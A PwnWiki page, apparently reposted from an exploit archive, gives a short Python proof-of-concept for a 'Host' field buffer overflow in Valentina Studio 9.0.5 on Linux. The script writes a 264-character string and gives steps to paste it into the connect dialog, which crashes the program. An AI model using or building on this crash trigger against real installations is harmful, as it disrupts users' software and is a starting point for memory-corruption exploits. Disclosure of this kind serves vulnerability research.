Valentina Studio 9.0.5 Linux - 'Host' 緩衝區溢出漏洞

From PwnWiki
Revision as of 13:04, 2 May 2021 by Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # -*- coding: utf-8 -*- # Exploit Title: Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC) # Date: 20/02/2019 # Author: Alejandra Sánchez # Vendor Hom...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

EXP

# -*- coding: utf-8 -*-
# Exploit Title: Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)
# Date: 20/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://valentina-db.com/en/
# Software Link: https://www.valentina-db.com/en/all-downloads/vstudio/current/vstudio_x64_lin-deb?format=raw
# Version: 9.0.5
# Tested on: Linux kali amd64

# Proof of Concept:
# 1.- Run the python script "vstudio.py", it will create a new file "vstudio.txt"
# 2.- Copy the text from the generated vstudio.txt file to clipboard
# 3.- Open VStudio
# 4.- Go to File > Connect to...
# 5.- Click on Valentina Server or SQLite Server
# 6.- Paste clipboard in 'Host' field
# 7.- Click on button -> Connect
# 8.- Crashed

buffer = "\x41" * 264
f = open ("vstudio.txt", "w")
f.write(buffer)
f.close()
Retrieved from "https://pwnwiki.com/index.php?title=Valentina_Studio_9.0.5_Linux_-_%27Host%27_緩衝區溢出漏洞&oldid=2040"